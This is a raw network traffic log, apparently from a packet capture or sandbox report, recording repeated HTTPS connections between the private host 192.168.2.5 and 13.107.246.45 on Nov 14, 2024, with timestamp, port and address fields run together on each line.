                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.253859043 CET49780443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.253906965 CET4434978013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.254776001 CET49780443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.254776001 CET49780443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.254826069 CET4434978013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.353223085 CET4434977613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.353727102 CET49776443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.353759050 CET4434977613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.354214907 CET49776443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.354227066 CET4434977613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.405647993 CET4434977713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.406491995 CET49777443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.406531096 CET4434977713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.406919003 CET49777443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.406924963 CET4434977713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.418454885 CET4434977813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.419029951 CET49778443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.419058084 CET4434977813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.419384956 CET49778443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.419390917 CET4434977813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.485614061 CET4434977613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.485713005 CET4434977613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.485774040 CET49776443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.485933065 CET49776443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.485954046 CET4434977613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.485965967 CET49776443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.485970974 CET4434977613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.488609076 CET49781443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.488656998 CET4434978113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.488724947 CET49781443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.488862991 CET49781443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.488871098 CET4434978113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.537149906 CET4434977713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.537206888 CET4434977713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.537262917 CET49777443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.537448883 CET49777443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.537448883 CET49777443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.537470102 CET4434977713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.537482023 CET4434977713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.540745974 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.540786028 CET4434978213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.541492939 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.541492939 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.541531086 CET4434978213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.552807093 CET4434977813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.552961111 CET4434977813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.553343058 CET49778443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.553383112 CET49778443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.553383112 CET49778443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.553404093 CET4434977813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.553415060 CET4434977813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.556278944 CET49783443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.556364059 CET4434978313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.556461096 CET49783443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.556787968 CET49783443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.556818962 CET4434978313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.603368044 CET4434977913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.603991032 CET49779443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.604015112 CET4434977913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.604433060 CET49779443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.604438066 CET4434977913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.734483957 CET4434977913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.734643936 CET4434977913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.734713078 CET49779443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:32.734965086 CET49779443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.676320076 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.676332951 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.725518942 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.725542068 CET4434978213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.866827011 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.868652105 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.868690968 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.869456053 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.869462967 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.010862112 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.011455059 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.011588097 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.025854111 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.025892973 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.025911093 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.025919914 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104374886 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104410887 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104692936 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104692936 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104718924 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.106800079 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.107336044 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.107403994 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.107656002 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.107671022 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.165277958 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.166394949 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.166430950 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.166811943 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.166820049 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240027905 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240046978 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240101099 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240230083 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240230083 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.251357079 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.251357079 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.251405001 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.251434088 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255606890 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255654097 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255723953 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255862951 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255872011 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.297637939 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298022985 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298105001 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298187017 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298187017 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298229933 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298257113 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301554918 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301651001 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301739931 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301884890 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301915884 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.413260937 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.413809061 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.413822889 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.414339066 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.414344072 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543659925 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543709993 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543785095 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543813944 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543843031 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543898106 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.645445108 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.645445108 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.645498037 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.645525932 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648684978 CET49798443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648721933 CET4434979813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648787975 CET49798443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648941040 CET49798443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648952961 CET4434979813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.906409979 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.907027006 CET49794443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.907056093 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.907608986 CET49794443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.907622099 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.039164066 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.039808035 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.039971113 CET49794443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.041538000 CET49794443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.041567087 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.041582108 CET49794443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.041588068 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.044384956 CET4434979513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.045270920 CET49799443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.045320988 CET4434979913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.045384884 CET49799443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.046057940 CET49795443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.046120882 CET4434979513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.046514988 CET49795443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.046530008 CET4434979513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.047380924 CET49799443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.047399044 CET4434979913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.175292969 CET4434979513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.175393105 CET4434979513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.175580978 CET49795443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.175730944 CET49795443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.175730944 CET49795443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.175777912 CET4434979513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.175806999 CET4434979513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.179049015 CET49800443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.179102898 CET4434980013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.179166079 CET49800443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.179625034 CET49800443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.179642916 CET4434980013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.196070910 CET4434979713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.196938992 CET49797443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.196969032 CET4434979713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.197388887 CET49797443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.197396040 CET4434979713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.291194916 CET4434979613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.291861057 CET49796443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.291878939 CET4434979613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.292361021 CET49796443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.292366028 CET4434979613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.327508926 CET4434979713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.327682018 CET4434979713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.327887058 CET49797443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.328197956 CET49797443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.328218937 CET4434979713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.328232050 CET49797443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.328238964 CET4434979713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.331482887 CET49801443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.331535101 CET4434980113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.331609964 CET49801443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.331780910 CET49801443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.331794024 CET4434980113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.382389069 CET4434979813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.384658098 CET49798443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:36.384677887 CET4434979813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.402425051 CET49803443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.402447939 CET4434980313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.402463913 CET49803443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.402472019 CET4434980313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.406027079 CET49807443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.406116009 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.406579018 CET49807443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.406784058 CET49807443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.406814098 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.456727028 CET4434980213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.456752062 CET4434980213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.456794977 CET4434980213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.456845045 CET49802443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.456888914 CET49802443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.458096027 CET49802443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.458125114 CET4434980213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.458141088 CET49802443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.458148003 CET4434980213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.461951017 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.461996078 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.462060928 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.463932991 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.463958979 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.642992020 CET4434980413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.643573999 CET49804443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.643594027 CET4434980413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.644495010 CET49804443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.644501925 CET4434980413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.776894093 CET4434980413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.776921034 CET4434980413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.776961088 CET4434980413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.777120113 CET49804443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.777120113 CET49804443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.778947115 CET49804443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.778948069 CET49804443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.778974056 CET4434980413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.778983116 CET4434980413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.783380032 CET49809443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.783446074 CET4434980913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.783890963 CET49809443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.786488056 CET49809443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:37.786510944 CET4434980913.107.246.45192.168.2.5
